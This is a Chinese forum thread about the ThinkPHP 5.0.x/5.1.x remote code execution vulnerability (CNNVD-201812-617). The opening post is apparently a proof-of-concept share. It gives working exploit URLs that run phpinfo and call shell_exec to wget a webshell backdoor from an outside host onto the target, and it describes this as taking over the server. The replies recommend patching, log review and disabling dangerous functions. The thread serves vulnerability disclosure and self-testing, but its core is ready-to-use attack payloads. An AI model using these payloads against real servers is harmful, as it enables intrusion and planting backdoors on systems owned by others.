thinkphp v5.x 远程代码执行漏洞poc
本帖最后由 90_ 于 2018-12-16 22:32 编辑20181216补充:
1.执行phpinfo
http://unhonker.com/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars=system&vars[]=php%20-r%20'phpinfo();'
2. 利用该漏洞远程执行下载命令,通过wget远程下载一个webshell后门,执行命令从而获得服务器权限。
其攻击URI详情如下:
/admin.php?s=admin/think\app/invokefunction&function=call_user_func_array&vars=shell_exec&vars[]=wget+-O+help.php+http%3a%2f%2ftzrj.host.smartgslb.com%2fhelp.php.txt
通过执行wget命令:
wget -O help.php http://tzrj.host.smartgslb.com/help.php.txt
下载webshell。
前言
近日,国家信息安全漏洞库(CNNVD)收到关于ThinkPHP远程代码执行漏洞(CNNVD-201812-617)情况的报送。成功利用此漏洞的攻击者可以对目标系统进行远程代码执行攻击。ThinkPHP的5.0.x版和5.1.x版等多个版本均受此漏洞影响。目前,该漏洞的部分漏洞验证代码已经公开,同时ThinkPHP官方已经发布更新修复了该漏洞,建议受该漏洞影响的ThinkPHP用户尽快采取修补措施。
危害影响
成功利用此漏洞的攻击者可以对目标系统进行远程代码执行攻击。目前,该漏洞的部分漏洞验证代码已在互联网上公开,近期被利用的可能性较大。
受漏洞影响版本如下:
ThinkPHP 5.0.x、5.1.x。
poc
Re: thinkphp v5.x 远程代码执行漏洞poc
感谢楼主分享,这个漏洞确实影响很大,尤其是5.0.x和5.1.x版本的用户要特别注意。官方的补丁已经出了,建议受影响的站点尽快升级或修复,避免被利用。楼主提供的poc也很有参考价值,方便安全测试和自查。Re: thinkphp v5.x 远程代码执行漏洞poc
感谢分享,这个漏洞确实影响很大,官方已经出了修复补丁,建议所有使用ThinkPHP 5.0.x和5.1.x的用户尽快升级到最新版,或者确认是否在配置中关闭了debug模式及做好了路由安全限制。公开的POC也提醒我们要及时关注框架安全更新,避免服务器被入侵。Re: thinkphp v5.x 远程代码执行漏洞poc
这是一个非常危险的漏洞,感谢楼主分享POC和攻击细节。ThinkPHP 5.0.x和5.1.x用户务必尽快升级到官方修复版本,并检查服务器日志中是否有类似请求。另外建议在服务器上禁用不必要的危险函数(如system、shell_exec等),同时为网站目录设置严格权限,避免被写入恶意文件。安全无小事,大家快行动起来!
页:
[1]